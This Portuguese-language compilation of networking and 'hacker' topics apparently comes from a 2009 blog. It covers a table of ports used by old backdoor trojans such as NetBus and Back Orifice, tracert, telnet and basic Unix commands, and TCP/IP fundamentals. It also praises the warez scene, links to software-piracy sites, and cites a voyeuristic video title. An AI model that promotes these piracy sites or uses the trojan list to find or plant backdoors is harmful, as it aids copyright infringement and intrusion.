Porta 12345 - GabanBus, NetBus
Porta 12346 - GabanBus, NetBus
Porta 12361 - Whack-a-mole
Porta 12362 - Whack-a-mole
Porta 16969 - Priority
Porta 20001 - Millennium
Porta 20034 - NetBus 2 Pro, NetRex Pro
Porta 21544 - GirlFriend
Porta 22222 - Prosiak 0.47
Porta 23456 - Evil FTP, Ugly FTP, WhackJob
Porta 26274 - Delta
Porta 30029 - AOLTrojan1.1
Porta 30100 - NetSphere
Porta 30303 - Sockets de Troie 2.5
Porta 30999 - Kuang
Porta 31337 - Back Orifice
Porta 31338 - Back Orifice, DeepBO
Porta 31339 - NetSpy DK
Porta 31666 - BOWhack
Porta 31787 - Hack'a'tack
Porta 33333 - Prosiak
Porta 34324 - BigGluck, TN, Tiny Telnet Server
Porta 40412 - The Spy
Porta 40421 - Master's Paradise
Porta 40422 - Master's Paradise
Porta 40423 - Master's Paradise
Porta 40426 - Master's Paradise
Porta 47262 - Delta
Porta 50505 - Sockets de Troie
Porta 50766 - Fore
Porta 53001 - Remote Windows Shutdown
Porta 61466 - Telecommando
Porta 65000 - Devil

tracerts

O utilitário Tracert exibe a rota de um pacote até que este alcance seu destino , sendo útil para determinarmos se a rota falhou , qual rotador falhou e o tempo de resposta . Se você está tendo problemas com conexão , ele pode ser útil para definir a localização do problema .

Tracert usa o ICMP para realizar seu trabalho . Primeiro ele determina o n;úmero de "saltos" de roteadores para seu destino . Então envia um número de pacotes ICMP igual a de "saltos". No primeiro pacote ele seta o "TTL" (time to live) para 1 e , cada pacote sucessivo , incrementa o TTL em 1 . Cada tempo de pacote que passa por um roteador , teme seu TTL decrementado pelo mesmo até alcançar 0 . A maioria dos roteadores mandam de volta uma mensagem ao rementente que indica se o pacote foi descartado . Isto significa que o primeiro pacote enviado com um TTL de 1 , será devolvido pelo primeiro roteador , o segundo pacote com um TTL de 2 , será devolvido pelo segundo roteador e assim por diante .

Sintexe :

tracert [-d] [-h max_hops] [-j host_list] [-w timeout] destination

Onde :

D : Determina para não encontrar o endereço IP do host name ;

H mx_host : Determina o número máximo de "saltos" para procurar o destino ;

J host_list : Determina a rota de origem ao longo de host_list ;

W timeout (Intervalo) : Determina um intervalo de tempo para cada pacote , em milissegundo ;

Destination : Especifica o hostname ou endereço IP do compiuador destino .

warez

O mundo warez é formado por especialistas em desbloquear programas e invadir sistemas com o objetivo de criar grandes depósitos de softwares para a comunidade de colecionadores compulsivos de bits.

Existe ainda, por trás dessa atividade um apelo filosófico que acredita que um software deve cair em domínio público assim que atinge um grande volume de vendas. Mas, afinal o que é Warez?

É uma definição undergroud para a cópia de um software com copyryght, um software pirata, Os sites deniminados warez geralmente contêm este tipo de software e são acessados para a realização de verdadeiras nogociatas no submundo da rede. Warez é totalmente diferente na pirataria tradicional, apesar de ambos estarem cometendo o mesmo tipo de crime. Os piaratas que garvam CDs com toneladas de softwares comerciais visam o lucro finaceiro. No caso do warez, o que existe e move esta estranha atividade é a compulsão por colecionar e conhecer novos programas. A moeda nas negociações são os próprios softawares-softwares se paga em softwares, fazendo com que a comunidade Warez seja uma sociedade baseada na troca de bits.

O universo warez é dividido em grupos, como uma família. Cada um possui suas tarefas e responsabilidades para que, juntos possam usufruir de alguma coisa melhor.

Alguns Links.

[P A S T]

http://pages.infinit.net/obsidian/index.htm

Dead End FTPZ

http://home.thezone.net/~cgriffit

Warez Ftp

http://www.warezftp.org/

(C)Warez

http://hem2.passagen.se/resto/cwarez
Elite Verified Sitez

http://209.75.36.214/
DaBoY's Warez

http://home.att.net/~xxdaboyxx
Warez Universe

http://www.pbtech.com/~warezuni/
Warez pathfinder

http://www.multimedia-/

FAT3 WAREZ DIRECT

http://www.bright.net/~brandonr

WareZ GameZ DownloadZ

http://www4.torget.se/users/p/Pudeln/warez/warez.htm³

truques you tube

para você melhor a qualidade de seus vídeos bastos acrescentarem "&fmt=18" logo apos u link do vídeo,

por exemplo: (Vídeo - Flagra de Calcinhas)

http://www.youtube.com/watch?v=5aZBEHvQ5B4 (normal)

http://www.youtube.com/watch?v=5aZBEHvQ5B4&fmt=18 (bom)



--------------------------------------------



Baixar os vídeos do YOUTUBE sem Programa

Qual programa eu uso para baixar os vídeos do YOUTUBE?

A resposta é simples: Nenhum!


Explicarei o procedimento:


• Entre no site www.youtube.com e procure pelo vídeo do qual você deseja fazer o download! Após encontrado o vídeo desejado, clique para
abrir como se você fosse assisti-lo. Depois de ter feito isso, vá até a barra de endereços: Lá estará um link parecido com este:

http://br.youtube.com/watch?v=D-Kfcq5KM9o



• Vá até a barra de endereços e apague a palavra " watch? " , apague também o sinal de igualdade " = " , no lugar do sinal de igualdade
coloque " / " , ficará assim:

http://br.youtube.com/v/D-Kfcq5KM9o



• Aperte enter, o vídeo ficará em uma tela inteira, após aparecer o vídeo na tela inteira, note que o link estará diferente, ex:

http://br.youtube.com/swf/l.swf?video_id=D...hCSqVwd103kqfYV



• Apague " swf/l.swf " e coloque " get_video " , ex:

http://br.youtube.com/get_video?video_id=D...hCSqVwd103kqfYV



• Aperte enter e pronto, abrira a janela perguntando aonde você deseja salvar o arquivo.

OBS.: APÓS TERMINAR O DOWNLOAD NÃO ABRA-O, RENOME-O, COLOQUE " . " E O FORMATO QUE DESEJA,

EX: "Video.Avi"

telnet

(Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se excutar programas e comandos em outra máquina, como se o teclado de seu computador estivesse ligado diretamente a ela.
O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é a mais comun em servidores que permitem acesso público).

O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele também é muito usado por operadores de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores, está muito enganado; muitas vezes ele faz a manutenção de casa mesmo, via Telnet !)

Programas para Telnet:
Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um (procure no diretório c:\windows o programa Telnet.exe - deve estar lá !).

Conectando-se via Telnet:
Os passos que apresentamos aqui são para o programa que acompanha o windows 95, mas servem perfeitamente para outros programas, com algumas variações, que você pode perceber e contornar. Se você tem algum dos programas listados ao lado, leia isto primeiro e depois passe para a página específica desse programa.

Inicie o programa Telnet.exe ou outro utilitário para esse fim. Clique no menu "Conecta" (connect), selecione "Sistema Remoto" (remote system) e digite na caixa "Nome do Host" (Host Name) o endereço ao qual você quer se conectar (ex.: spacelink.msfc.nasa.gov).

Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type) selecione "telnet" e "vt100", respectivamente (isso não é um padrão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isto, clique no botão "Conectar" (Connect). Isto iniciará a conexão com o computador remoto.

Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha. No nosso exemplo, digite "guest" e aperte enter (lembre-se, você está operando um sistema de interface parecida com o DOS - na verdade é Unix - esqueça o mouse e use o teclado !). Isto abrirá as portas do computador remoto para você.

Na tela surge uma série de opções, precedidas de um número ou letra. Para executar um desses comandos, digite esse número ou letra e aperte enter (os usuários da época pré-windows não terão a menor dificuldade com isso).

Explore o sistema ao qual você se conectou para exercitar. Quando quiser terminar a conexão, volte ao menu "Conecta" e selecione "Desconectar".

Abaixo temos alguns endereços onde você pode fazer uma conexão via Telnet

netfind.if.usp.br
Busca mundial de usuários na Internet.
Digite netfind ao estabelecer a conexão.
ned.ipac.caltech.edu
Banco de dados Extragalático da
NASA/IPAC. Digite ned na conexão.
spacelink.msfc.nasa.gov
Banco de dados da NASA. Digite guest ao
se conectar.
stis.nsf.gov
Informações científicas e tecnológicas.
Digite public na conexão.
Espero que, com estas informações, você já seja capaz de fazer uma conexão deste tipo. Alguns endereços não vão ter nada de interessante, mas não se desanime. Você pode encontrar muito material de pesquisa via Telnet.

Exercício:
Conecte-se ao Banco de Dados da NASA e copie para seu computador uma foto tirada pelo telescópio Hubble (acredite, vai dar um pouco de trabalho encontrar, mas não desanime; ao final você já vai estar bem mais familiarizado com o Telnet !) ;-)


Comandos básicos de Unix:
A maioria dos servidores não permite acesso público via Telnet, porque essa é a principal porta de entrada de Hackers. Nestes servidores não se encontra menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer alguns comandos de Unix.

Se você é WebMaster, muitas vezes vai ter acesso a provedores de presença, via FTP e, em alguns casos, Telnet, para efetuar algumas operações que o FTP não permite. Segue abaixo uma pequena lista de comandos que lhe serão muito úteis neste caso:

ls -l
lista os arquivos de um diretório
ls -al
lista todos os arquivos de um diretório, mesmo os Hidden
cp x y
copia o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)
mv x y
move o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)
rm x
deleta o arquivo x
cd xxx
muda o diretório ativo para xxx
cd ..
muda o diretório ativo para o que está 'acima' do atual
mkdir xxx
cria o diretório xxx dentro do diretório atual
rm xxx
remove o diretório xxx.

tc/pip

TCP/IP (Transmission Control Protocol/Internet Protocol, ou Protocolo de Controle de Transmissão / Protocolo da Internet) se refere ao conjunto de protocolos utilizados na Internet. Ele inclui uma série de padrões que especificam como os computadores vão se comunicar e cria convenções para interconectar redes e para o routeamento através dessas conexões.

Os protocolos da Internet (IP) são o resultado de um projeto da DARPA (Defense Advanced Research Projects Agency, ou Agência de Projetos de Pesquisa Avançada de Defesa) sobre conectividade entre redes no final dos anos 70. Ele foi utilizado em todas as redes de longa distância do sistema de Defesa dos EUA em 1983, mas não foi amplamente aceito até ser incorporado ao BSD (Berkeley Software Distribution) Unix 4.2. A populariedade do TCP/IP é baseada em:
· Estrutura cliente-servidor robusta. O TCP/IP é uma excelente plataforma cliente-servidor, especialmente em ambientes WAN (wide-area network, ou redes de grande alcance).
· Compartilhamento de informações. Milhares de organizações miltiares, educacionais, científicas e comerciais compartilham dados, correio eletrônico (e-mail), e outros serviços na Internet usando o TCP/IP.
· Ampla disponibilidade. Implementações do TCP/IP estão disponívies em praticamente todos os sistemas operacionais populares. Seu código fonte é amplamente disponível em várias implementações. Fabricantes de bridges, routers e analizadores de redes oferecem suporte para o TCP/IP em seus produtos.


Conceitos Basicos
Existem alguns conceitos básicos que são imprencindíveis ao entendimento do TCP/IP e de redes que o utilizam.
Número de IP
Existem algumas analogias entre computadores e telefones e o número de IP é uma delas. Você pode imaginar o número IP como um número de telefone com todos os códigos de discagem internacional. Isto significa que qualquer máquina pode contactar outra máquina usando o número de IP, bastando apenas que exista um caminho entre as 2 máquinas. Além disso toda máquina na rede tem de ter um nº de IP.
Isto também significa que 2 máquinas na mesma rede NÃO podem ter o mesmo número de IP. Essa restrição só ocorre para máquinas na mesma rede, pois máquinas numa rede não conectada usualmente tem número de IP iguais, por algumas razões técnicas. No caso da analogia com os telefones, imagine 2 pessoas morando em países diferentes que possuam o mesmo número de telefone (apenas os números locais). Nesse caso não há conflito (exceto talvez na sua mente! :-) ).
O número de IP tem 4 bytes de tamanho e tem um formato específico, xxx.xxx.xxx.xxx (exemplo : 200.241.216.20). Isso significa que cada grupamento xxx só pode ir de 0 à 255 (pois essa é a capacidade de 1 byte).
Mascara de Sub-Rede
Existem 3 classes de endereços IP : classes A, B, C. A diferença entre as classes é a forma de como o nº de IP é interpretado. O nº de IP é divido em duas partes : o endereço da rede e o enderço da sub-rede. Considere o nº IP da seguinte forma : w.x.y.z (ex: 200.241.216.20)
ClasseNº de IPIndicador da redeIndicador da Sub-redeNº de redes disponíveisNº de sub-redes disponíveis A1.126wx.y.z12616,777,214 B128.191w.xy.z16,38465,534 C192.223w.x.yz2,097,151254 Obs: O endereço 192.168 é reservado para uso em redes internas, o endereço 127 é utilizado para testes de loopback e os acima de 224 (inclusive) são reservados para protocolos especiais.
Uma sub-rede é uma rede ligada diretamente a Internet através de uma rede pertencente a Internet. A rede pertencente recebe um nº de IP, e distribui nº de IP dentro de sua sub-rede. As classes apenas definem quantas sub-redes um nº de IP tem. De acordo com a tabela, existem 126 nº de IP da classe A e cada um deles pode ter 16.777.214 sub-redes. Você logo pode imaginar que não existem endereços classe A para todo mundo, e tem razão, atualmente não existem endereços classe A e B disponíveis na Internet, e os de classe C estão acabando, o IETF (Internet Engenniering Task Force, ou Força Tarefa de Engenharia da Internet ) está estudando a expansão desses números.
As máscaras de sub-rede identificam a classe do nº de IP. A primeira vista isso parece desnecessário, pois basta olhar o primeiro número do nº do IP para determinar sua classe. Mas acontece que um nº de IP classe A pode funcionar como um classe B ou classe C, dependendo da estrutura interna de sua sub-rede. Um exemplo : Imagine uma empresa com 200 filiais no Brasil conectadas por uma rede própria. A matriz tem um nº de IP classe A, digamos 100 e distribui suas sub-redes da seguinte forma :
100.1.0.0Matriz 100.2.0.0Filial 1 100.3.0.0Filial 2 ....... 100.201.0.0Filial 200 Para as filiais, o nº de IP (ex: 100.201.0.0) é de classe B, pois só tem 16.384 sub-redes disponíveis, embora comece com 100. Dentro das filiais ainda é possível se distribuir sub-redes, as quais teriam nº de IP classe C.
Para que o roteamento funcione corretamente, os computadores precisam saber qual a classe do nº de IP, e elas são as seguintes:
ClasseMáscara de Sub-rede A255.0.0.0 B255.255.0.0 C255.255.255.0
Gateway Padrão (Default Gateway)
O gateway padrão é a máquina para quem pedimos ajuda quando não conseguimos achar uma outra máquina na rede. Funciona assim: Quando uma máquina na rede precisa se comunicar com uma outra, ela emite um pedido de conexão (esse pedido é feito através de broadcasting, ou seja, a máquina envia um pedido a toda a rede, e apenas a máquina destino responde) e aguarda uma resposta. Se a resposta não vier, ela entra em contato com o gateway padrão e solicita que o mesmo conecte com a máquina destino. Se o gateway conseguir se conectar à máquina destino, ele fica como "intermediador" dessa conexão, caso contrário ele avisa a máquina solicitante que não foi possível encontrar a máquina destino.
Essa estrutura de procura visa diminuir o tráfego desnecessário na rede. Imagine só se toda a solicitação de conexão realizada na Internet (e em todas as redes conectadas à Intenet) fosse enviada para todos os computadores ligados à ela! Seria um tráfego muito grande. Ao invés disso, o broadcasting é feito em níveis, primeiro na LAN (local area network, ou rede local), depois na WAN de sua cidade ou estado, depois na WAN nacional até chegar na WAN internacional. Reduz-se desse modo todo o tráfego interno às WANs e LANs, aliviando as linhas de conexão.
DNS
Essas 3 letras não significam muita coisa para a maior parte das pessoas, mas elas significam Domain Name System (ou Sistema de Nomes de Domínio). Essas 3 palavras também não significam muita coisa para a maior parte das pessoas também, por isso vamos à analogia com o telefone. Quando deseja telefonar para a loja da esquina, você consulta o catálogo, descobre o telefone de lá e liga. Você não consegue telefonar para lugar algum se não souber o número do telefone. Na rede TCP/IP acontece a mesma coisa. Os usuários não decoram o número IP das máquinas, e sim seus nomes. Mas para se alcançar uma máquina na rede, precisamos do seu número de IP. Para resolver isso, foi criado o DNS, um serviço diponível na rede que, dado um nome de máquina, ele retorna o número de IP da mesma.
Existe uma particularidade aqui. No caso da rede local estar conectada a alguma outra, é recomendável que o servidor DNS (o programa que oferece o serviço DNS) seja executado na máquina de ligação entre as 2 redes (o gateway), para que no caso do nome requisitado não existir na rede local, o DNS possa pedir ao servidor DNS da outra rede para pesquisar tal nome.
O Windows NT oferece um serviço semelhante, o WINS (Windows Internet Name System, ou Sistema de nomes da Internet do Windows). A principal diferença entre os dois é que o DNS usa uma tabela estática, e o WINS usa uma tabela dinâmica. No caso do servidor DNS rodar numa máquina Windows NT é recomendável que ele seja substituído pelo WINS.
DHCP
Mais um caso de 4 letras que não significam nada para a maioria das pessoas. Mas infelizmente não existe uma boa analogia para o DHCP, portanto vamos direto ao assunto: DHCP significa Dynamic Host Configuration Protocol ou seja : Protocolo de Configuração de Host Dinâmico. Numa rede TCP/IP, todo computador tem de ter um número de IP distinto. Isto significa que antes de colocar uma nova máquina na rede, o administrador teria de checar quais números estão sendo utilizados para poder escolher um nº adequado para a nova máquina. Em pequenas redes isso é possível de ser feito, mas em grandes redes isso se torna uma tarefa muito tediosa e sujeita a falhas. Para evitar isso, foi criado o DHCP. Quando uma máquina entra na rede, ela procura o servidor DHCP (cujo nº de IP foi previamente fornecido) e solicita um nº de IP para si própria. O servidor verifica qual o nº disponível, informa ao solicitante esse nº e o torna indisponível para futuras solicitações. Dessa maneira, a administração dos nº de IP é feita automaticamente e não existem problemas de conflito. Quando a máquina solicitante sai da rede, o servidor DHCP torna seu nº de IP disponível novamente.
Portas
Uma porta pode ser vista como um canal de comunicações para uma máquina. Pacotes de informações chegando a uma máquina não são apenas endereçadas à maquina, e sim à máquina numa determinada porta. Você pode imaginar uma porta como sendo um canal de rádio, com a diferença fundamental de que um computador pode "ouvir" a todos os 65000 canais possíveis ao mesmo tempo!
Entretanto, um computador geralmente não está escutando a todas as portas, ele escuta umas poucas portas específicas. E ele não vai responder a um pedido que chegue numa porta a qual ele não esteja escutando.
Existem uma série de portas pré-definidas para certos serviços que são aceitos universalmente. As principais são :
ServiçoPortaDescrição FTP21File Transfer Protocol (Protocolo de Transferência de Arquivos) Telnet23Para se conectar remotamente a um servidor SMTP25Para enviar um e-mail Gopher70Browser baseado em modo texto HTTP80Protocolo WWW - Netscape, Mosaic POP3110Para receber e-mail NNTP119Newsgroups IRC6667Internet Relay Chat - Bate papo on-line Compuserve4144Compuserve WinCIM AOL5190America Online MSN569Microsoft Network Outros Termos
· Roteador : É um computador especial que é utilizado para conectar 2 ou mais redes distintas. Ele tem esse nome porque tem de "rotear" (ou redirecionar) os pacotes de uma rede para outra, atuando como um "guarda de trânsito" para os pacotes entre as redes.
· Gateway : O gateway é um computador que também é utilizado para conectar 2 ou mais redes distintas. A principal diferença para o roteador é que o gateway não tem hardware especial para efetuar o roteamento. Usualmente os gateways conectam LANs e os roteadores, WANs. Em vários casos se utiliza um roteador em conjunto com um gateway.
Visão Geral de uma rede TCP IP
Uma rede utilizando o TCP/IP tem uma estrutura básica composta por um (ou mais) servidor rodando um servidor DNS (ou WINS), DHCP, SMTP, POP3 e os servidores dos serviços desejados (HTTP, Gopher, Telnet e etc) e as máquinas clientes solicitando esses serviços. Para se interligar essa rede a uma outra rede TCP/IP, se faz necessário o uso de um roteador ou gateway e da correta configuração da rede.
Existem 2 maneiras de se ligar a LAN à Internet :
· Atribuindo-se um nº de IP válido para cada máquina na rede, o que pode ser impossível para redes com muitas máquinas.
· Atribuindo-se um nº de IP válido para o gateway e utilizando-se o nº de IP 192.168.x.x internamente.
Como o segundo caso é o mais factível, vamos observá-lo melhor. Nele, se utiliza internamente à LAN o IP 192.168.x.x, que quando da determinação do padrão dos nº de IP foi reservado para uso em redes internas, ou seja, nenhuma máquina ligada diretamente à Internet tem um IP 192.168.x.x. Isso é necessário pois como já vimos nenhuma máquina pode ter um nº de IP que já esteja sendo utilizado por uma outra máquina.
O gateway tem 2 interfaces de rede, uma para se conectar à Internet e outra para se conectar à LAN. À interface da Internet é atribuido o nº de IP válido na Internet e na da LAN o nº de IP do tipo 192.168.x.x (usualmente 192.168.0.1). Nas máquinas da LAN o nº de IP é do tipo 192.168.x.x (aonde o 1º "x" é o mesmo do do gateway) e o gateway default é o IP do gateway voltado para a LAN (192.168.x.x). Dessa forma podemos ter até 16.384 máquinas na internet por nº de IP válido. Essa estrutura também facilita a adoção de medidas de segurança contra intrusos da Internet, pois como todo o tráfego Internet passa pelo gateway, basta protegê-lo para proteger toda a LAN.
Protocolos
TCP e IP
O TCP e o IP são apenas 2 membros da família TCP/IP. IP é um protocolo que providência a entrega de pacotes para todos os outros protocolos da família TCP/IP. O IP oferece um sistema de entrega de dados sem conexão. Isto é, os pacotes IP não são garantidos de chegarem ao seu destino, nem de serem recebidos na ordem em que foram enviados. O checksum do IP confirma apenas a integridade do cabeçalho do pacote. Desta maneira, a responsabilidade pelos dados contidos no pacote do IP (e sua sequência) é tarefa de protocolos de mais alto-nível.
Talvez o protocolo de alto nível do IP mais comum seja o TCP. O TCP oferece um confiável protocolo baseado em conexão encapsulado no IP. O TCP garante a entrega dos pacotes, assegura o sequenciamento dos pacotes, e providencia um checksum que valida tanto o cabeçalho quanto os dados do pacote. No caso da rede perder ou corromper um pacote TCP/IP durante a transmissão, é tarefa do TCP retransmitir o pacote faltoso ou incorreto. Essa confiabilidade torna o TCP/IP o protocolo escolhido para transmissões baseadas em sessão, aplicativos cliente-servidor e serviços críticos como correio eletrônico.
Porém essa confiabilidade tem um preço. Os cabeçalhos dos pacotes TCP requerem o uso de bits adicionais para assegurar o correto sequenciamento da informação, bem como um checksum obrigatório para garantir a integridade do cabeçalho e dos dados. Para garantir a entrega dos pacotes, o protocolo também requer que o destinatário informe o recebimento do pacote.
Tal "informação de recebimento" (ou ACKs, de acknowledgments) geram tráfego adicional na rede, diminuindo a taxa de transferência de dados em favor da confiabilidade. Para reduzir o impacto na peformance, a maioria dos servidores enviam um ACK para todo segmento de dados (ao invés de todo pacote) ou quando um ACK expira.
UDP
Se a confiabilidade não é essencial, o UDP (User Datagram Protocol), um complemento do TCP, oferece um serviço de transmissão de dados sem conexão que não garante nem a entrega nem a correta sequência dos pacotes enviados (bem parecido com o IP). Checksums no UDP são opcionais, ofereccndo assim uma maneira de se trocar dados em uma rede altamente confiável sem consumir desnecessariamente recursos da rede.
ARP e ICMP
Dois outros protocolos na família TCP/IP tem importantes funções, embora essas funções não estejam diretamente relacionadas com a transmissão de dados: ARP (Address Resolution Protocol, ou Protocolo de Resolução de endereços) e ICMP (Internet Control Message Protocol, ou Protocolo de Controle de Mensagens da Internet). O ARP e o ICMP são protocolos de manutenção que mantêm a estrutura do IP e usualmente são invisíveis aos usuários e às aplicações.
Os cabeçalhos do IP contém tanto o endereço IP da origem quanto do destino, mas o endereço do hardware também tem de ser conhecido. O IP obtém um endereço de hardware de um determinado sistema difundindo pela rede um pacote especial de requisição (um pacote ARP de requisição) contendo o endereço IP do sistema com o qual está tentando se comunicar. Todos os nós da rede local que tiverem o ARP habilitado detectam essa difusão, e o sistema que tem o número de IP em questão envia um pacote (do tipo ARP reply, ou resposta ARP) contendo seu endereço de hardware para o computador que o solicitou. O endereço de hardware e o endereço IP do computador estão é armazenado no cache do ARP para uso futuro. Como a resposta ARP também é feita na forma de difusão, é normal que outros nós usem essa informação para atualizar seus caches ARP.
O ICMP permite que 2 nós em uma rede IP compartilhem o status do IP (protocolo) e informação de erros. Esta informação pode ser usada por protocolos de alto nível para tratar problemas de transmissão ou para administradores de rede para detectar problemas na rede. Embora estejam encapsulados em pacotes IP, o ICMP não é considerado um protocolo de alto nível (ele é necessário em toda implementação do TCP/IP). O utilitário ping faz uso do ICMP para determinar se um certo endereço IP na rede está operacional. Isto é útil para diagnosticar problemas em redes IP ou falhas em gateways.
Outros Protocolos
Além desses protocolos citados, existem os protocolos de alto-nível, como o Telnet, FTP, HTTP e etc. Vamos a uma breve descrição deles :
· Telnet : É um protocolo que permite o logon em máquinas remotas. Você passa a utilizar a máquina remota para realizar o processamento. No Windows NT existe o RAS (Remote Access Service, Serviço de Acesso Remoto) que tem os mesmos objetivos do Telnet.
· FTP : File Transfer Protocol (protocolo de transferência de arquivos), como o nome já diz é utilizado para a transferência de arquivos.
· HTTP: Hyper Text Transfer Protocol : É o protocolo utilizado pela Web, ele transmite textos, gráficos e qualquer outro tipo de arquivo (substituindo o FTP) além de permitir a navegação através de hiper texto.

©2009 ''modificado porkay